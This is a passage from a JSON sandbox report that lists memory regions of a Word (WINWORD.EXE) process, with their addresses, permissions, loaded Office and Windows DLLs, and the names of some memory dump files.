"readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_245", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:32.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_246", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:32.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_247", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:32.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1945600, "start_va": 5358616576, "type": "region", "version": 1 }, "end_va": 5360562175, "entry_point": 5358616576, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "id": "region_248", "name": "winword.exe", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\winword.exe", "region_type": "memory_mapped_file", "start_va": 5358616576, 
"timestamp": "00:00:32.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 65536, "start_va": 8790693969920, "type": "region", "version": 1 }, "end_va": 8790694035455, "entry_point": 0, "filename": null, "id": "region_249", "name": "private_0x000007febe310000", "norm_filename": null, "region_type": "private_memory", "start_va": 8790693969920, "timestamp": "00:00:32.742", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11505664, "start_va": 8791332618240, "type": "region", "version": 1 }, "end_va": 8791344123903, "entry_point": 8791332618240, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\CHART.DLL", "id": "region_250", "name": "chart.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\chart.dll", "region_type": "memory_mapped_file", "start_va": 8791332618240, "timestamp": "00:00:32.743", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2240512, "start_va": 8791344152576, "type": "region", "version": 1 }, "end_va": 8791346393087, "entry_point": 8791344152576, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL", "id": "region_251", "name": "riched20.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll", "region_type": "memory_mapped_file", "start_va": 8791344152576, "timestamp": "00:00:32.758", 
"type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1564672, "start_va": 8791348805632, "type": "region", "version": 1 }, "end_va": 8791350370303, "entry_point": 8791348805632, "filename": "\\Windows\\System32\\DWrite.dll", "id": "region_252", "name": "dwrite.dll", "norm_filename": "c:\\windows\\system32\\dwrite.dll", "region_type": "memory_mapped_file", "start_va": 8791348805632, "timestamp": "00:00:32.952", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1900544, "start_va": 8791350378496, "type": "region", "version": 1 }, "end_va": 8791352279039, "entry_point": 8791350378496, "filename": "\\Windows\\System32\\d3d10warp.dll", "id": "region_253", "name": "d3d10warp.dll", "norm_filename": "c:\\windows\\system32\\d3d10warp.dll", "region_type": "memory_mapped_file", "start_va": 8791350378496, "timestamp": "00:00:32.964", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1507328, "start_va": 8791352279040, "type": "region", "version": 1 }, "end_va": 8791353786367, "entry_point": 8791352279040, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL", "id": "region_254", "name": "msptls.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msptls.dll", "region_type": "memory_mapped_file", "start_va": 8791352279040, "timestamp": "00:00:32.971", "type": "region", 
"version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1552384, "start_va": 8791353786368, "type": "region", "version": 1 }, "end_va": 8791355338751, "entry_point": 8791353786368, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL", "id": "region_255", "name": "msointl.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll", "region_type": "memory_mapped_file", "start_va": 8791353786368, "timestamp": "00:00:32.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 82046976, "start_va": 8791355359232, "type": "region", "version": 1 }, "end_va": 8791437406207, "entry_point": 8791355359232, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL", "id": "region_256", "name": "msores.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll", "region_type": "memory_mapped_file", "start_va": 8791355359232, "timestamp": "00:00:33.032", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9572352, "start_va": 8791437410304, "type": "region", "version": 1 }, "end_va": 8791446982655, "entry_point": 8791437410304, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft 
Shared\\OFFICE16\\MSO99LRES.DLL", "id": "region_257", "name": "mso99lres.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll", "region_type": "memory_mapped_file", "start_va": 8791437410304, "timestamp": "00:00:33.035", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 19775488, "start_va": 8791447044096, "type": "region", "version": 1 }, "end_va": 8791466819583, "entry_point": 8791447044096, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL", "id": "region_258", "name": "mso.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll", "region_type": "memory_mapped_file", "start_va": 8791447044096, "timestamp": "00:00:33.038", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8175616, "start_va": 8791466835968, "type": "region", "version": 1 }, "end_va": 8791475011583, "entry_point": 8791466835968, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll", "id": "region_259", "name": "mso99lwin32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lwin32client.dll", "region_type": "memory_mapped_file", "start_va": 8791466835968, "timestamp": "00:00:33.116", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", 
"permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9351168, "start_va": 8791475027968, "type": "region", "version": 1 }, "end_va": 8791484379135, "entry_point": 8791475027968, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll", "id": "region_260", "name": "mso40uiwin32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll", "region_type": "memory_mapped_file", "start_va": 8791475027968, "timestamp": "00:00:33.119", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4685824, "start_va": 8791484399616, "type": "region", "version": 1 }, "end_va": 8791489085439, "entry_point": 8791484399616, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll", "id": "region_261", "name": "mso30win32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll", "region_type": "memory_mapped_file", "start_va": 8791484399616, "timestamp": "00:00:33.129", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3162112, "start_va": 8791489118208, "type": "region", "version": 1 }, "end_va": 8791492280319, "entry_point": 8791489118208, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll", "id": "region_262", "name": "mso20win32client.dll", "norm_filename": 
"c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll", "region_type": "memory_mapped_file", "start_va": 8791489118208, "timestamp": "00:00:33.140", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 18268160, "start_va": 8791492329472, "type": "region", "version": 1 }, "end_va": 8791510597631, "entry_point": 8791492329472, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\OART.DLL", "id": "region_263", "name": "oart.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\oart.dll", "region_type": "memory_mapped_file", "start_va": 8791492329472, "timestamp": "00:00:33.150", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 811008, "start_va": 8791510614016, "type": "region", "version": 1 }, "end_va": 8791511425023, "entry_point": 8791510614016, "filename": "\\Windows\\System32\\d3d11.dll", "id": "region_264", "name": "d3d11.dll", "norm_filename": "c:\\windows\\system32\\d3d11.dll", "region_type": "memory_mapped_file", "start_va": 8791510614016, "timestamp": "00:00:33.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 37351424, "start_va": 8791511465984, "type": "region", "version": 1 }, "end_va": 8791548817407, "entry_point": 8791511465984, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\WWLIB.DLL", "id": "region_265", "name": "wwlib.dll", "norm_filename": "c:\\program 
files\\microsoft office\\root\\office16\\wwlib.dll", "region_type": "memory_mapped_file", "start_va": 8791511465984, "timestamp": "00:00:33.217", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791550525440, "type": "region", "version": 1 }, "end_va": 8791551152127, "entry_point": 8791550525440, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_266", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791550525440, "timestamp": "00:00:33.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3178496, "start_va": 8791551180800, "type": "region", "version": 1 }, "end_va": 8791554359295, "entry_point": 8791551180800, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL", "id": "region_267", "name": "mso40uires.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll", "region_type": "memory_mapped_file", "start_va": 8791551180800, "timestamp": "00:00:33.264", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791555899392, "type": "region", "version": 1 }, "end_va": 8791556354047, "entry_point": 8791555899392, "filename": 
"\\Windows\\System32\\mscoree.dll", "id": "region_268", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791555899392, "timestamp": "00:00:33.266", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 770048, "start_va": 8791556358144, "type": "region", "version": 1 }, "end_va": 8791557128191, "entry_point": 8791556358144, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL", "id": "region_269", "name": "wwintl.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\1033\\wwintl.dll", "region_type": "memory_mapped_file", "start_va": 8791556358144, "timestamp": "00:00:33.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 8791557537792, "type": "region", "version": 1 }, "end_va": 8791557779455, "entry_point": 8791557537792, "filename": "\\Windows\\System32\\mlang.dll", "id": "region_270", "name": "mlang.dll", "norm_filename": "c:\\windows\\system32\\mlang.dll", "region_type": "memory_mapped_file", "start_va": 8791557537792, "timestamp": "00:00:33.289", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791592992768, "type": "region", "version": 1 }, "end_va": 8791593041919, "entry_point": 8791592992768, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_271", "name": "npmproxy.dll", "norm_filename": 
"c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 8791592992768, "timestamp": "00:00:33.298", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791598891008, "type": "region", "version": 1 }, "end_va": 8791599353855, "entry_point": 8791598891008, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_272", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 8791598891008, "timestamp": "00:00:33.304", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2039808, "start_va": 8791606886400, "type": "region", "version": 1 }, "end_va": 8791608926207, "entry_point": 8791606886400, "filename": "\\Windows\\System32\\msxml6.dll", "id": "region_273", "name": "msxml6.dll", "norm_filename": "c:\\windows\\system32\\msxml6.dll", "region_type": "memory_mapped_file", "start_va": 8791606886400, "timestamp": "00:00:33.312", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791616716800, "type": "region", "version": 1 }, "end_va": 8791616729087, "entry_point": 8791616716800, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l1-2-0.dll", "id": "region_274", "name": "api-ms-win-core-file-l1-2-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l1-2-0.dll", "region_type": 
"memory_mapped_file", "start_va": 8791616716800, "timestamp": "00:00:33.378", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791616782336, "type": "region", "version": 1 }, "end_va": 8791616794623, "entry_point": 8791616782336, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-processthreads-l1-1-1.dll", "id": "region_275", "name": "api-ms-win-core-processthreads-l1-1-1.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-processthreads-l1-1-1.dll", "region_type": "memory_mapped_file", "start_va": 8791616782336, "timestamp": "00:00:33.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791616847872, "type": "region", "version": 1 }, "end_va": 8791616860159, "entry_point": 8791616847872, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-synch-l1-2-0.dll", "id": "region_276", "name": "api-ms-win-core-synch-l1-2-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-synch-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 8791616847872, "timestamp": "00:00:33.392", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791617110016, "type": "region", "version": 1 }, "end_va": 8791617122303, "entry_point": 8791617110016, "filename": "\\Program Files\\Microsoft 
Office\\root\\Office16\\api-ms-win-core-localization-l1-2-0.dll", "id": "region_277", "name": "api-ms-win-core-localization-l1-2-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-localization-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 8791617110016, "timestamp": "00:00:33.399", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791617175552, "type": "region", "version": 1 }, "end_va": 8791617187839, "entry_point": 8791617175552, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l2-1-0.dll", "id": "region_278", "name": "api-ms-win-core-file-l2-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l2-1-0.dll", "region_type": "memory_mapped_file", "start_va": 8791617175552, "timestamp": "00:00:33.405", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791619076096, "type": "region", "version": 1 }, "end_va": 8791619088383, "entry_point": 8791619076096, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-timezone-l1-1-0.dll", "id": "region_279", "name": "api-ms-win-core-timezone-l1-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-timezone-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 8791619076096, "timestamp": "00:00:33.411", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", 
"writable", "executable" ], "ref_process_dump": null, "size": 991232, "start_va": 8791619403776, "type": "region", "version": 1 }, "end_va": 8791620395007, "entry_point": 8791619403776, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\ucrtbase.dll", "id": "region_280", "name": "ucrtbase.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\ucrtbase.dll", "region_type": "memory_mapped_file", "start_va": 8791619403776, "timestamp": "00:00:33.418", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791622221824, "type": "region", "version": 1 }, "end_va": 8791622250495, "entry_point": 8791622221824, "filename": "\\Windows\\System32\\msimg32.dll", "id": "region_281", "name": "msimg32.dll", "norm_filename": "c:\\windows\\system32\\msimg32.dll", "region_type": "memory_mapped_file", "start_va": 8791622221824, "timestamp": "00:00:33.473", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1216512, "start_va": 8791622287360, "type": "region", "version": 1 }, "end_va": 8791623503871, "entry_point": 8791622287360, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll", "id": "region_282", "name": "c2r64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll", "region_type": "memory_mapped_file", "start_va": 8791622287360, "timestamp": "00:00:33.480", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], 
"ref_process_dump": null, "size": 499712, "start_va": 8791623532544, "type": "region", "version": 1 }, "end_va": 8791624032255, "entry_point": 8791623532544, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream64.dll", "id": "region_283", "name": "appvisvstream64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll", "region_type": "memory_mapped_file", "start_va": 8791623532544, "timestamp": "00:00:33.491", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000397-addr_0x00000000099b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_11", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 161153024, "type": "region", "version": 1 }, "end_va": 162201599, "entry_point": 0, "filename": null, "id": "region_397", "name": "private_0x00000000099b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 161153024, "timestamp": "00:00:37.940", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000402-addr_0x000007fffff78000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_12", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092465152, "type": "region", "version": 1 }, "end_va": 8796092473343, "entry_point": 0, "filename": null, "id": "region_402", "name": "private_0x000007fffff78000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092465152, "timestamp": "00:00:37.958", "type": "region", "version": 1 }, { "dump": { "filename": 
"process_00000001-region_00000403-addr_0x000007fffff7a000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_13", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092473344, "type": "region", "version": 1 }, "end_va": 8796092481535, "entry_point": 0, "filename": null, "id": "region_403", "name": "private_0x000007fffff7a000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092473344, "timestamp": "00:00:37.959", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000404-addr_0x0000000002a10000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_14", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 44105728, "type": "region", "version": 1 }, "end_va": 44109823, "entry_point": 0, "filename": null, "id": "region_404", "name": "private_0x0000000002a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 44105728, "timestamp": "00:00:38.102", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000405-addr_0x0000000002a20000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_15", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 44171264, "type": "region", "version": 1 }, "end_va": 44175359, "entry_point": 0, "filename": null, "id": "region_405", "name": "private_0x0000000002a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 44171264, "timestamp": "00:00:38.102", "type": "region", 
"version": 1 }, { "dump": { "filename": "process_00000001-region_00000406-addr_0x0000000002a30000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_16", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 44236800, "type": "region", "version": 1 }, "end_va": 44240895, "entry_point": 0, "filename": null, "id": "region_406", "name": "private_0x0000000002a30000", "norm_filename": null, "region_type": "private_memory", "start_va": 44236800, "timestamp": "00:00:38.102", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000407-addr_0x0000000002c70000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_17", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 46596096, "type": "region", "version": 1 }, "end_va": 46600191, "entry_point": 0, "filename": null, "id": "region_407", "name": "private_0x0000000002c70000", "norm_filename": null, "region_type": "private_memory", "start_va": 46596096, "timestamp": "00:00:38.103", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000408-addr_0x0000000002e80000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_18", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 48758784, "type": "region", "version": 1 }, "end_va": 49807359, "entry_point": 0, "filename": null, "id": "region_408", "name": "private_0x0000000002e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 48758784, "timestamp": 
"00:00:38.103", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000409-addr_0x0000000002f80000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_19", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 49807360, "type": "region", "version": 1 }, "end_va": 49811455, "entry_point": 0, "filename": null, "id": "region_409", "name": "private_0x0000000002f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 49807360, "timestamp": "00:00:38.103", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000410-addr_0x0000000002f90000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_20", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 49872896, "type": "region", "version": 1 }, "end_va": 49876991, "entry_point": 0, "filename": null, "id": "region_410", "name": "private_0x0000000002f90000", "norm_filename": null, "region_type": "private_memory", "start_va": 49872896, "timestamp": "00:00:38.103", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000411-addr_0x0000000002fa0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_21", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 49938432, "type": "region", "version": 1 }, "end_va": 49942527, "entry_point": 0, "filename": null, "id": "region_411", "name": "private_0x0000000002fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 
